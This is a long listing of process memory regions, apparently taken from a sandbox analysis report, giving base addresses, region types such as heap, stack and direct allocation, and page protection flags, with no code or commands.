page execute and read and write
3797000
heap
page read and write
4611000
heap
page read and write
37B8000
heap
page read and write
212B5580000
heap
page read and write
2F9F000
stack
page read and write
2B2E000
stack
page read and write
8B4000
heap
page read and write
876000
heap
page read and write
32F1000
trusted library allocation
page read and write
2A3E000
stack
page read and write
1DFDEF59000
heap
page read and write
4830000
direct allocation
page read and write
7BB000
heap
page read and write
783000
heap
page read and write
37CC000
heap
page read and write
3B4000
heap
page read and write
15952D19000
heap
page read and write
3768000
heap
page read and write
4C00000
direct allocation
page execute and read and write
F14000
unkown
page execute and read and write
4841000
heap
page read and write
830000
heap
page read and write
4841000
heap
page read and write
7BE000
heap
page read and write
7A6000
heap
page read and write
756000
heap
page read and write
54C0000
direct allocation
page execute and read and write
3FAE000
stack
page read and write
899000
heap
page read and write
C28000
unkown
page execute and read and write
1BF7F000
stack
page read and write
7AC000
heap
page read and write
37E0000
heap
page read and write
7A6000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
37B7000
heap
page read and write
37B5000
heap
page read and write
7FFD9B9CD000
trusted library allocation
page execute and read and write
7DA4000
heap
page read and write
3B4000
heap
page read and write
379F000
heap
page read and write
58A17DC000
stack
page read and write
AF0000
heap
page read and write
8CE000
heap
page read and write
C89000
unkown
page read and write
1D79E000
stack
page read and write
3742000
heap
page read and write
7FFD9BB40000
trusted library allocation
page execute and read and write
7CB000
heap
page read and write
37CC000
heap
page read and write
912000
heap
page read and write
17B0000
trusted library allocation
page read and write
7A6000
heap
page read and write
5530000
direct allocation
page execute and read and write
762000
heap
page read and write
CD0000
heap
page read and write
7A0000
heap
page read and write
3B4000
heap
page read and write
396E000
stack
page read and write
35FE000
stack
page read and write
2D8F2FE0000
heap
page read and write
37B8000
heap
page read and write
3797000
heap
page read and write
4611000
heap
page read and write
3417000
trusted library allocation
page read and write
212B5403000
heap
page read and write
4A70000
direct allocation
page execute and read and write
38F3000
trusted library allocation
page read and write
8AE000
heap
page read and write
37B3000
heap
page read and write
4611000
heap
page read and write
3CFE000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
37A3000
heap
page read and write
37AC000
heap
page read and write
24911458000
heap
page read and write
7BB000
heap
page read and write
7BE000
heap
page read and write
1FA3FCA0000
heap
page read and write
88E000
heap
page read and write
830000
heap
page read and write
37B8000
heap
page read and write
BB8000
heap
page read and write
7DA0000
heap
page read and write
914000
heap
page read and write
7B0000
heap
page read and write
802000
heap
page read and write
7BE000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
13413000
trusted library allocation
page read and write
37B8000
heap
page read and write
1DFDEFA4000
heap
page read and write
7BE000
heap
page read and write
8CF000
heap
page read and write
7A1000
heap
page read and write
40B000
unkown
page read and write
400000
unkown
page readonly
3773000
heap
page read and write
37AC000
heap
page read and write
20000
unkown
page readonly
1C54E000
stack
page read and write
3777000
heap
page read and write
4611000
heap
page read and write
899000
heap
page read and write
BEE000
stack
page read and write
4830000
direct allocation
page read and write
37C9000
heap
page read and write
12DE000
stack
page read and write
400000
unkown
page readonly
B00000
heap
page read and write
7BE000
heap
page read and write
800000
heap
page read and write
37C9000
heap
page read and write
8B4000
heap
page read and write
35BF000
stack
page read and write
37CC000
heap
page read and write
830000
heap
page read and write
778000
heap
page read and write
1DFDEF47000
heap
page read and write
4CD0000
direct allocation
page read and write
3773000
heap
page read and write
4611000
heap
page read and write
9AF000
stack
page read and write
1DA8E000
stack
page read and write
35BF000
stack
page read and write
914000
heap
page read and write
3777000
heap
page read and write
378A000
heap
page read and write
3796000
heap
page read and write
AC2BDAB000
stack
page read and write
4841000
heap
page read and write
802000
heap
page read and write
7FFD9B99D000
trusted library allocation
page execute and read and write
8CA000
heap
page read and write
4C80000
direct allocation
page execute and read and write
3767000
heap
page read and write
800000
heap
page read and write
3742000
heap
page read and write
282E000
stack
page read and write
566E000
stack
page read and write
F3A7B4A000
stack
page read and write
15952D08000
heap
page read and write
10BE000
unkown
page execute and read and write
3758000
heap
page read and write
375E000
heap
page read and write
914000
heap
page read and write
3782000
heap
page read and write
321E000
stack
page read and write
37A1000
heap
page read and write
37BB000
heap
page read and write
4611000
heap
page read and write
323F000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
87A000
heap
page read and write
4841000
heap
page read and write
2D6E2C50000
heap
page read and write
387E000
stack
page read and write
778000
heap
page read and write
212B53B0000
heap
page read and write
8C0000
heap
page read and write
4841000
heap
page read and write
37C5000
heap
page read and write
7A0000
heap
page read and write
DF0000
heap
page read and write
740000
heap
page read and write
7A0000
heap
page read and write
7B5000
heap
page read and write
912000
heap
page read and write
3773000
heap
page read and write
4611000
heap
page read and write
A0000
heap
page read and write
3754000
heap
page read and write
1A0000
heap
page read and write
7BE000
heap
page read and write
830000
heap
page read and write
374C000
heap
page read and write
1E4DA000
heap
page read and write
4A90000
direct allocation
page execute and read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
802000
heap
page read and write
8CB000
heap
page read and write
7A0000
heap
page read and write
1DFDEF54000
heap
page read and write
1490000
heap
page read and write
912000
heap
page read and write
DB0000
heap
page read and write
4610000
heap
page read and write
C8B000
unkown
page execute and read and write
830000
heap
page read and write
7B5000
heap
page read and write
37C8000
heap
page read and write
F2A000
unkown
page execute and write copy
377F000
heap
page read and write
2D6E2870000
heap
page read and write
7BE000
heap
page read and write
800000
heap
page read and write
7FFD9B9CC000
trusted library allocation
page execute and read and write
830000
heap
page read and write
8C0000
heap
page read and write
1FA3FCD8000
heap
page read and write
7AD000
heap
page read and write
37E0000
heap
page read and write
37B7000
heap
page read and write
153E000
stack
page read and write
914000
heap
page read and write
C82000
unkown
page execute and read and write
37E0000
heap
page read and write
8CF000
heap
page read and write
7BE000
heap
page read and write
3743000
heap
page read and write
7B5000
heap
page read and write
374E000
heap
page read and write
E20000
heap
page read and write
45EE000
stack
page read and write
3778000
heap
page read and write
3762000
heap
page read and write
800000
heap
page read and write
373C000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
374C000
heap
page read and write
3E3E000
stack
page read and write
37AC000
heap
page read and write
DFF000
unkown
page execute and write copy
37AC000
heap
page read and write
286E000
stack
page read and write
876000
heap
page read and write
3777000
heap
page read and write
37C7000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
1540000
heap
page read and write
800000
heap
page read and write
3778000
heap
page read and write
212B5416000
heap
page read and write
74C000
heap
page read and write
BCD000
heap
page read and write
7F6000
stack
page read and write
912000
heap
page read and write
D10000
heap
page read and write
800000
heap
page read and write
630000
direct allocation
page read and write
422E000
stack
page read and write
3796000
heap
page read and write
820000
trusted library allocation
page read and write
1BF70000
heap
page read and write
E40000
heap
page read and write
355F000
trusted library allocation
page read and write
15952D2A000
heap
page read and write
F2B000
unkown
page execute and write copy
3783000
heap
page read and write
37B0000
heap
page read and write
4611000
heap
page read and write
212B53EB000
heap
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
1C0000
heap
page read and write
37B8000
heap
page read and write
8B4000
heap
page read and write
4611000
heap
page read and write
93C000
heap
page read and write
27AE000
stack
page read and write
8AE000
heap
page read and write
7A0000
heap
page read and write
3D3F000
stack
page read and write
7FFD9B9FC000
trusted library allocation
page execute and read and write
4710000
trusted library allocation
page read and write
518E000
stack
page read and write
C89000
unkown
page read and write
40F000
unkown
page write copy
802000
heap
page read and write
4611000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
378C000
heap
page read and write
B30000
heap
page read and write
93D000
heap
page read and write
22799095000
heap
page read and write
1CB4E000
stack
page read and write
10BF000
unkown
page execute and write copy
2C7F000
stack
page read and write
C8B000
unkown
page execute and read and write
377D000
heap
page read and write
37A6000
heap
page read and write
68E000
stack
page read and write
BF4000
stack
page read and write
26CC28D0000
heap
page read and write
830000
heap
page read and write
30AE000
stack
page read and write
4EC0000
heap
page read and write
778000
heap
page read and write
379E000
heap
page read and write
212B5720000
heap
page read and write
4611000
heap
page read and write
379F000
heap
page read and write
3B4000
heap
page read and write
4841000
heap
page read and write
3561000
trusted library allocation
page read and write
A50000
heap
page read and write
37F0000
heap
page read and write
3757000
heap
page read and write
377E000
heap
page read and write
37C8000
heap
page read and write
374A000
heap
page read and write
912000
heap
page read and write
8CA000
heap
page read and write
778000
heap
page read and write
37A6000
heap
page read and write
4841000
heap
page read and write
37AC000
heap
page read and write
4841000
heap
page read and write
802000
heap
page read and write
1FA3FEA5000
heap
page read and write
3757000
heap
page read and write
800000
heap
page read and write
1D28E000
stack
page read and write
E20000
heap
page read and write
37CC000
heap
page read and write
4830000
direct allocation
page read and write
802000
heap
page read and write
4841000
heap
page read and write
5490000
direct allocation
page execute and read and write
7BE000
heap
page read and write
4611000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
800000
heap
page read and write
8BC000
heap
page read and write
88E000
heap
page read and write
800000
heap
page read and write
37CC000
heap
page read and write
3705000
heap
page read and write
372000
unkown
page readonly
8B4000
heap
page read and write
1E05D000
heap
page read and write
7B5000
heap
page read and write
800000
heap
page read and write
28F0000
heap
page read and write
C66000
heap
page read and write
8AE000
heap
page read and write
3B4000
heap
page read and write
95B000
heap
page read and write
830000
heap
page read and write
8CC000
heap
page read and write
3797000
heap
page read and write
7FFD9BB27000
trusted library allocation
page read and write
830000
heap
page read and write
7B0000
heap
page read and write
482F000
stack
page read and write
4841000
heap
page read and write
2D8F1400000
heap
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
1D4AF000
stack
page read and write
2D8F1660000
heap
page read and write
87A000
heap
page read and write
7B5000
heap
page read and write
37C4000
heap
page read and write
4E90000
direct allocation
page execute and read and write
629F000
stack
page read and write
912000
heap
page read and write
830000
heap
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
F2A000
unkown
page execute and read and write
3EBE000
stack
page read and write
F3A85FE000
stack
page read and write
C62A2FC000
stack
page read and write
802000
heap
page read and write
4AA0000
direct allocation
page read and write
7CB000
heap
page read and write
4841000
heap
page read and write
F3A82FE000
stack
page read and write
7BB000
heap
page read and write
212B53FD000
heap
page read and write
830000
heap
page read and write
37B2000
heap
page read and write
379B000
heap
page read and write
37B3000
heap
page read and write
3787000
heap
page read and write
645000
heap
page read and write
CF0000
heap
page read and write
8CD000
heap
page read and write
7B5000
heap
page read and write
777000
heap
page read and write
3773000
heap
page read and write
7CB000
heap
page read and write
801C000
stack
page read and write
37B0000
heap
page read and write
2F6F000
stack
page read and write
4611000
heap
page read and write
376A000
heap
page read and write
37A1000
heap
page read and write
4611000
heap
page read and write
14A0000
direct allocation
page read and write
3752000
heap
page read and write
3404FF000
unkown
page read and write
4611000
heap
page read and write
4841000
heap
page read and write
3B4000
heap
page read and write
3773000
heap
page read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
8BB000
heap
page read and write
3797000
heap
page read and write
912000
heap
page read and write
53CF000
stack
page read and write
7BB000
heap
page read and write
746000
heap
page read and write
180000
heap
page read and write
802000
heap
page read and write
37A3000
heap
page read and write
4611000
heap
page read and write
3743000
heap
page read and write
C7B000
heap
page read and write
8D0000
heap
page read and write
8CC000
heap
page read and write
12FE000
heap
page read and write
800000
heap
page read and write
830000
heap
page read and write
7CB000
heap
page read and write
970000
heap
page read and write
D20000
heap
page execute and read and write
37AC000
heap
page read and write
93D000
heap
page read and write
ACE000
heap
page read and write
1E060000
heap
page read and write
379E000
heap
page read and write
37B0000
heap
page read and write
1C150000
heap
page read and write
C20000
unkown
page readonly
800000
heap
page read and write
379F000
heap
page read and write
4611000
heap
page read and write
C33000
stack
page read and write
912000
heap
page read and write
4841000
heap
page read and write
8B4000
heap
page read and write
811C000
stack
page read and write
4830000
direct allocation
page read and write
1E1AE000
stack
page read and write
4441000
heap
page read and write
3B4000
heap
page read and write
800000
heap
page read and write
374E000
heap
page read and write
3752000
heap
page read and write
37B6000
heap
page read and write
914000
heap
page read and write
13221000
trusted library allocation
page read and write
37CD000
heap
page read and write
3778000
heap
page read and write
3FBF000
stack
page read and write
87A000
heap
page read and write
93A000
heap
page read and write
37B3000
heap
page read and write
876000
heap
page read and write
74E000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
40FF000
stack
page read and write
2D8F1680000
heap
page read and write
7BB000
heap
page read and write
2D6E2C55000
heap
page read and write
914000
heap
page read and write
40EE000
stack
page read and write
375D000
heap
page read and write
BB5000
heap
page read and write
37B4000
heap
page read and write
1CBED000
stack
page read and write
93D000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7BB000
heap
page read and write
40B000
unkown
page write copy
8B4000
heap
page read and write
37AC000
heap
page read and write
37A3000
heap
page read and write
7BB000
heap
page read and write
31BE000
stack
page read and write
7BE000
heap
page read and write
3747000
heap
page read and write
5520000
direct allocation
page execute and read and write
43BE000
stack
page read and write
2DFE000
stack
page read and write
2CFF000
stack
page read and write
3E2F000
stack
page read and write
8CF000
heap
page read and write
4ED0000
direct allocation
page execute and read and write
3767000
heap
page read and write
137D000
heap
page read and write
1E5000
heap
page read and write
876000
heap
page read and write
37AC000
heap
page read and write
37AC000
heap
page read and write
37AF000
heap
page read and write
37C4000
heap
page read and write
93D000
heap
page read and write
3780000
trusted library allocation
page read and write
37C4000
heap
page read and write
4841000
heap
page read and write
5E0000
heap
page read and write
800000
heap
page read and write
3B4000
heap
page read and write
379B000
heap
page read and write
38B1000
trusted library allocation
page read and write
8CE000
heap
page read and write
77C000
heap
page read and write
3774000
heap
page read and write
12BF000
heap
page read and write
15952CDB000
heap
page read and write
8CA000
heap
page read and write
4841000
heap
page read and write
4841000
heap
page read and write
E11000
unkown
page execute and read and write
8C0000
heap
page read and write
37A3000
heap
page read and write
802000
heap
page read and write
4841000
heap
page read and write
914000
heap
page read and write
830000
heap
page read and write
3782000
heap
page read and write
358F000
trusted library allocation
page read and write
3740000
trusted library allocation
page read and write
378C000
heap
page read and write
212B53B7000
heap
page read and write
3743000
heap
page read and write
347F000
stack
page read and write
778000
heap
page read and write
AC2C1FF000
stack
page read and write
A10000
heap
page read and write
4611000
heap
page read and write
3777000
heap
page read and write
423F000
stack
page read and write
373E000
heap
page read and write
37AF000
heap
page read and write
45FF000
stack
page read and write
4611000
heap
page read and write
802000
heap
page read and write
8CF000
heap
page read and write
1DFDEF5D000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
4441000
heap
page read and write
800000
heap
page read and write
830000
heap
page read and write
800000
heap
page read and write
14FE000
stack
page read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
37AF000
heap
page read and write
7A5000
heap
page read and write
37AF000
heap
page read and write
7CB000
heap
page read and write
3739000
heap
page read and write
135C1000
trusted library allocation
page read and write
7AE000
heap
page read and write
40B000
unkown
page write copy
11CD000
stack
page read and write
7A6000
heap
page read and write
15952C70000
heap
page read and write
427E000
stack
page read and write
3746000
heap
page read and write
377E000
heap
page read and write
37AC000
heap
page read and write
378C000
heap
page read and write
778000
heap
page read and write
32D7000
trusted library allocation
page read and write
8B4000
heap
page read and write
899000
heap
page read and write
32EF000
stack
page read and write
397F000
stack
page read and write
8CF000
heap
page read and write
B0000
heap
page read and write
3792000
heap
page read and write
3785000
heap
page read and write
7D0000
heap
page read and write
37B5000
heap
page read and write
830000
heap
page read and write
379E000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
249117E5000
heap
page read and write
B7A000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7B5000
heap
page read and write
C70000
heap
page read and write
443F000
stack
page read and write
7A5000
heap
page read and write
C6A000
unkown
page execute and write copy
747000
heap
page read and write
914000
heap
page read and write
1065000
heap
page read and write
7FFD9B99D000
trusted library allocation
page execute and read and write
8CF000
heap
page read and write
3751000
heap
page read and write
3F7E000
stack
page read and write
93B000
heap
page read and write
BF6000
heap
page read and write
1CD5E000
stack
page read and write
43BE000
stack
page read and write
3739000
heap
page read and write
40F000
unkown
page write copy
8CA000
heap
page read and write
5E0000
heap
page read and write
9CB000
unkown
page execute and read and write
1F0000
trusted library allocation
page read and write
7A6000
heap
page read and write
528F000
stack
page read and write
93D000
heap
page read and write
4EB0000
direct allocation
page execute and read and write
914000
heap
page read and write
C21000
unkown
page execute and write copy
7FFD9BA26000
trusted library allocation
page read and write
3798000
heap
page read and write
26CC2728000
heap
page read and write
378B000
heap
page read and write
1DE8F000
stack
page read and write
4841000
heap
page read and write
88B000
heap
page read and write
735000
heap
page read and write
115F000
stack
page read and write
14A0000
direct allocation
page read and write
3767000
heap
page read and write
800000
heap
page read and write
1BBD0000
heap
page execute and read and write
70E000
heap
page read and write
4611000
heap
page read and write
7FFD9B99D000
trusted library allocation
page execute and read and write
2E3F000
stack
page read and write
7BE000
heap
page read and write
376A000
heap
page read and write
778000
heap
page read and write
4FC0000
trusted library allocation
page read and write
4611000
heap
page read and write
551F000
stack
page read and write
B98000
heap
page read and write
914000
heap
page read and write
212B5380000
heap
page read and write
37AD000
heap
page read and write
3797000
heap
page read and write
14A0000
direct allocation
page read and write
7BB000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
4AB0000
direct allocation
page execute and read and write
37B8000
heap
page read and write
37B0000
heap
page read and write
1DFEB000
stack
page read and write
45FE000
stack
page read and write
37AC000
heap
page read and write
374E000
heap
page read and write
8BC000
heap
page read and write
3B4000
heap
page read and write
3797000
heap
page read and write
8C0000
heap
page read and write
48FE000
stack
page read and write
4611000
heap
page read and write
537E000
stack
page read and write
29FF000
stack
page read and write
802000
heap
page read and write
375B000
heap
page read and write
777000
heap
page read and write
37B3000
heap
page read and write
504E000
stack
page read and write
8C0000
heap
page read and write
88E000
heap
page read and write
378F000
heap
page read and write
3130000
heap
page read and write
3773000
heap
page read and write
3777000
heap
page read and write
3B4000
heap
page read and write
7AC000
heap
page read and write
1FA3FEA0000
heap
page read and write
37AD000
heap
page read and write
8CD000
heap
page read and write
547F000
stack
page read and write
3787000
heap
page read and write
4841000
heap
page read and write
413E000
stack
page read and write
3DFF000
stack
page read and write
7BB000
heap
page read and write
7C9000
heap
page read and write
914000
heap
page read and write
4611000
heap
page read and write
3746000
heap
page read and write
340F000
stack
page read and write
85A000
heap
page read and write
4611000
heap
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
800000
heap
page read and write
3789000
heap
page read and write
400000
unkown
page readonly
8C0000
heap
page read and write
4600000
direct allocation
page read and write
37AC000
heap
page read and write
8C0000
heap
page read and write
8CF000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
3780000
heap
page read and write
249113F0000
heap
page read and write
4841000
heap
page read and write
4611000
heap
page read and write
7BB000
heap
page read and write
37B9000
heap
page read and write
7BD000
heap
page read and write
8C0000
heap
page read and write
3765000
heap
page read and write
BBB000
heap
page read and write
8B5000
heap
page read and write
F2B000
unkown
page execute and write copy
37B5000
heap
page read and write
353F000
stack
page read and write
1790000
trusted library allocation
page read and write
5500000
direct allocation
page execute and read and write
4841000
heap
page read and write
249117E0000
heap
page read and write
914000
heap
page read and write
3767000
heap
page read and write
4841000
heap
page read and write
4E60000
direct allocation
page execute and read and write
912000
heap
page read and write
830000
heap
page read and write
914000
heap
page read and write
3752000
heap
page read and write
AD9000
heap
page read and write
3743000
heap
page read and write
781000
heap
page read and write
37AF000
heap
page read and write
4A10000
direct allocation
page execute and read and write
A14000
heap
page read and write
7FFD9B9A4000
trusted library allocation
page read and write
3780000
heap
page read and write
7B5000
heap
page read and write
37C7000
heap
page read and write
4C60000
direct allocation
page execute and read and write
912000
heap
page read and write
2491146A000
heap
page read and write
4E50000
direct allocation
page execute and read and write
32BF000
stack
page read and write
7BE000
heap
page read and write
3758000
heap
page read and write
4611000
heap
page read and write
8FC000
stack
page read and write
16F5000
heap
page read and write
1C680000
heap
page read and write
7BE000
heap
page read and write
3789000
heap
page read and write
1354000
heap
page read and write
373B000
heap
page read and write
4841000
heap
page read and write
7A1000
heap
page read and write
1F0000
trusted library allocation
page read and write
912000
heap
page read and write
6A10000
heap
page read and write
4841000
heap
page read and write
7A6000
heap
page read and write
1570000
heap
page read and write
2FD0000
heap
page execute and read and write
4940000
trusted library allocation
page read and write
7FFD9B994000
trusted library allocation
page read and write
828C000
stack
page read and write
A90000
heap
page read and write
10C1000
unkown
page execute and write copy
38FF000
stack
page read and write
7B5000
heap
page read and write
7CB000
heap
page read and write
8BC000
heap
page read and write
899000
heap
page read and write
37A3000
heap
page read and write
3754000
heap
page read and write
7BB000
heap
page read and write
376A000
heap
page read and write
4841000
heap
page read and write
3B4000
heap
page read and write
87A000
heap
page read and write
3751000
heap
page read and write
423F000
stack
page read and write
37B3000
heap
page read and write
800000
heap
page read and write
630000
direct allocation
page read and write
876000
heap
page read and write
7B0000
heap
page read and write
3506000
trusted library allocation
page read and write
4611000
heap
page read and write
2D3E000
stack
page read and write
212B542F000
heap
page read and write
C62A4FE000
stack
page read and write
830000
heap
page read and write
58A1A7F000
stack
page read and write
1C3E0000
heap
page read and write
133E1000
trusted library allocation
page read and write
8B4000
heap
page read and write
899000
heap
page read and write
1E57E000
heap
page read and write
2E10000
heap
page read and write
433E000
stack
page read and write
3CBF000
stack
page read and write
4600000
direct allocation
page read and write
37AC000
heap
page read and write
4841000
heap
page read and write
212B53FF000
heap
page read and write
3924000
trusted library allocation
page read and write
D50000
heap
page read and write
379F000
heap
page read and write
830000
heap
page read and write
4841000
heap
page read and write
333E000
stack
page read and write
2BFF000
stack
page read and write
912000
heap
page read and write
8C0000
heap
page read and write
377F000
heap
page read and write
26CC26F0000
heap
page read and write
16F0000
heap
page read and write
800000
heap
page read and write
7D0000
heap
page read and write
3774000
heap
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
373E000
heap
page read and write
406000
unkown
page readonly
7B5000
heap
page read and write
7B5000
heap
page read and write
830000
heap
page read and write
2D8F164C000
heap
page read and write
4611000
heap
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
7FFD9B99B000
trusted library allocation
page execute and read and write
95D000
heap
page read and write
7CB000
heap
page read and write
876000
heap
page read and write
7B0000
trusted library allocation
page read and write
37C8000
heap
page read and write
15953065000
heap
page read and write
4C70000
direct allocation
page execute and read and write
3B4000
heap
page read and write
376A000
heap
page read and write
4A10000
direct allocation
page execute and read and write
C30000
trusted library allocation
page read and write
80000
heap
page read and write
37B3000
heap
page read and write
7B5000
heap
page read and write
802000
heap
page read and write
899000
heap
page read and write
93D000
heap
page read and write
7CB000
heap
page read and write
4AA0000
direct allocation
page read and write
8C0000
heap
page read and write
37CA000
heap
page read and write
830000
heap
page read and write
912000
heap
page read and write
26DB000
stack
page read and write
37BB000
heap
page read and write
4600000
direct allocation
page read and write
212B53EB000
heap
page read and write
4841000
heap
page read and write
2D8F1500000
heap
page read and write
3773000
heap
page read and write
7B5000
heap
page read and write
11F0000
heap
page read and write
4841000
heap
page read and write
3787000
heap
page read and write
7BE000
heap
page read and write
3B4000
heap
page read and write
914000
heap
page read and write
35F7000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
3787000
heap
page read and write
37AC000
heap
page read and write
5C2000
heap
page read and write
963000
heap
page read and write
37CD000
heap
page read and write
3797000
heap
page read and write
4611000
heap
page read and write
3786000
heap
page read and write
37F4000
heap
page read and write
374E000
heap
page read and write
1DFDEF5F000
heap
page read and write
972000
heap
page read and write
157A000
heap
page read and write
800000
heap
page read and write
830000
heap
page read and write
9E6000
heap
page read and write
2D1F000
stack
page read and write
4D7F000
stack
page read and write
37AC000
heap
page read and write
3782000
heap
page read and write
8C0000
heap
page read and write
375D000
heap
page read and write
3797000
heap
page read and write
212B5400000
heap
page read and write
249113C0000
heap
page read and write
912000
heap
page read and write
3301000
trusted library allocation
page read and write
800000
heap
page read and write
3790000
heap
page read and write
3B0000
heap
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
3767000
heap
page read and write
F3A81FF000
stack
page read and write
7AC000
heap
page read and write
3B4000
heap
page read and write
C50000
trusted library allocation
page read and write
37C8000
heap
page read and write
760000
heap
page read and write
4EF0000
direct allocation
page execute and read and write
15952CF7000
heap
page read and write
37BA000
heap
page read and write
392F000
stack
page read and write
912000
heap
page read and write
BC0000
heap
page read and write
4E80000
direct allocation
page execute and read and write
373B000
heap
page read and write
E01000
unkown
page execute and write copy
7BB000
heap
page read and write
3790000
trusted library allocation
page read and write
800000
heap
page read and write
7CB000
heap
page read and write
8C0000
heap
page read and write
7CB000
heap
page read and write
8C0000
heap
page read and write
7FFD9B994000
trusted library allocation
page read and write
4611000
heap
page read and write
373E000
stack
page read and write
7A0000
heap
page read and write
8C0000
heap
page read and write
2CDF000
stack
page read and write
720000
remote allocation
page read and write
377F000
heap
page read and write
802000
heap
page read and write
802000
heap
page read and write
BF8000
heap
page read and write
377B000
heap
page read and write
37B5000
heap
page read and write
37B1000
heap
page read and write
3797000
heap
page read and write
1D0E000
stack
page read and write
8E3000
heap
page read and write
37BB000
heap
page read and write
762000
heap
page read and write
3799000
heap
page read and write
2B90000
heap
page execute and read and write
2D6E2A48000
heap
page read and write
DE599FF000
unkown
page read and write
8B4000
heap
page read and write
7BB000
heap
page read and write
C90000
trusted library allocation
page read and write
60E000
stack
page read and write
8AE000
heap
page read and write
7FFD9BA66000
trusted library allocation
page execute and read and write
37B3000
heap
page read and write
1250000
heap
page read and write
37AC000
heap
page read and write
7D0000
heap
page read and write
7FFD9BB17000
trusted library allocation
page read and write
49FE000
stack
page read and write
7BE000
heap
page read and write
1E578000
heap
page read and write
3773000
heap
page read and write
C70000
trusted library allocation
page read and write
2B7E000
stack
page read and write
914000
heap
page read and write
7A6000
heap
page read and write
3405FF000
stack
page read and write
37C8000
heap
page read and write
7BB000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
376A000
heap
page read and write
755000
heap
page read and write
323E000
stack
page read and write
4841000
heap
page read and write
378D000
heap
page read and write
802000
heap
page read and write
3789000
heap
page read and write
A90000
remote allocation
page read and write
376A000
heap
page read and write
4830000
direct allocation
page read and write
1D39E000
stack
page read and write
4C30000
direct allocation
page execute and read and write
800000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2FA1000
trusted library allocation
page read and write
212B53FD000
heap
page read and write
37AD000
heap
page read and write
37A7000
heap
page read and write
7BB000
heap
page read and write
4841000
heap
page read and write
375A000
heap
page read and write
1BFA0000
heap
page execute and read and write
3743000
heap
page read and write
1C74E000
stack
page read and write
1DFDEFBD000
heap
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
26CC274A000
heap
page read and write
212B542F000
heap
page read and write
7BB000
heap
page read and write
830000
heap
page read and write
29FF000
stack
page read and write
802000
heap
page read and write
C20000
unkown
page read and write
1BB3C000
stack
page read and write
2FBE000
stack
page read and write
37AC000
heap
page read and write
4841000
heap
page read and write
C21000
unkown
page execute and write copy
1D55E000
stack
page read and write
7B9000
heap
page read and write
6FA000
stack
page read and write
37B3000
heap
page read and write
446F000
stack
page read and write
7A1000
heap
page read and write
7CC000
heap
page read and write
619E000
stack
page read and write
F2A000
unkown
page execute and read and write
87A000
heap
page read and write
F3A87FC000
stack
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
8B4000
heap
page read and write
4611000
heap
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
D55000
heap
page read and write
37C9000
heap
page read and write
37AF000
heap
page read and write
37B3000
heap
page read and write
37B3000
heap
page read and write
12FA1000
trusted library allocation
page read and write
7D0000
heap
page read and write
190000
heap
page read and write
8BC000
heap
page read and write
4611000
heap
page read and write
3E7F000
stack
page read and write
3D2E000
stack
page read and write
3796000
heap
page read and write
1BB8C000
stack
page read and write
912000
heap
page read and write
40F000
unkown
page write copy
37AC000
heap
page read and write
8CD000
heap
page read and write
802000
heap
page read and write
3743000
heap
page read and write
33E1000
trusted library allocation
page read and write
3B4000
heap
page read and write
3762000
heap
page read and write
37CB000
heap
page read and write
1DFDEF8E000
heap
page read and write
800000
heap
page read and write
31A0000
heap
page execute and read and write
1DBEE000
stack
page read and write
3797000
heap
page read and write
37F4000
heap
page read and write
93C000
heap
page read and write
3605000
trusted library allocation
page read and write
53A1000
direct allocation
page read and write
8CF000
heap
page read and write
7B0000
heap
page read and write
1E070000
heap
page read and write
8BC000
heap
page read and write
378E000
heap
page read and write
802000
heap
page read and write
802000
heap
page read and write
3747000
heap
page read and write
1DFDEF20000
remote allocation
page read and write
379B000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
914000
heap
page read and write
3554000
trusted library allocation
page read and write
899000
heap
page read and write
62DE000
stack
page read and write
1B0000
heap
page read and write
7C3000
heap
page read and write
4611000
heap
page read and write
8C0000
heap
page read and write
8CC000
heap
page read and write
22798EF0000
heap
page read and write
3773000
heap
page read and write
37AE000
heap
page read and write
7E3000
heap
page read and write
376A000
heap
page read and write
2ADE000
stack
page read and write
B81000
heap
page read and write
8CE000
heap
page read and write
7BB000
heap
page read and write
800000
heap
page read and write
4841000
heap
page read and write
93D000
heap
page read and write
912000
heap
page read and write
3744000
heap
page read and write
1D3EE000
stack
page read and write
378F000
heap
page read and write
4611000
heap
page read and write
3A6F000
stack
page read and write
3F3F000
stack
page read and write
4611000
heap
page read and write
3AAE000
stack
page read and write
8CA000
heap
page read and write
E2E000
heap
page read and write
7BE000
heap
page read and write
914000
heap
page read and write
9F4000
stack
page read and write
37D4000
heap
page read and write
8AE000
heap
page read and write
37C4000
heap
page read and write
830000
heap
page read and write
1E04E000
heap
page read and write
37AC000
heap
page read and write
1296000
heap
page read and write
4841000
heap
page read and write
414000
unkown
page readonly
4DA5000
heap
page read and write
7B0000
heap
page read and write
7BB000
heap
page read and write
3789000
heap
page read and write
44BF000
stack
page read and write
B8F000
heap
page read and write
414000
unkown
page readonly
802000
heap
page read and write
1C0A0000
heap
page execute and read and write
12FA9000
trusted library allocation
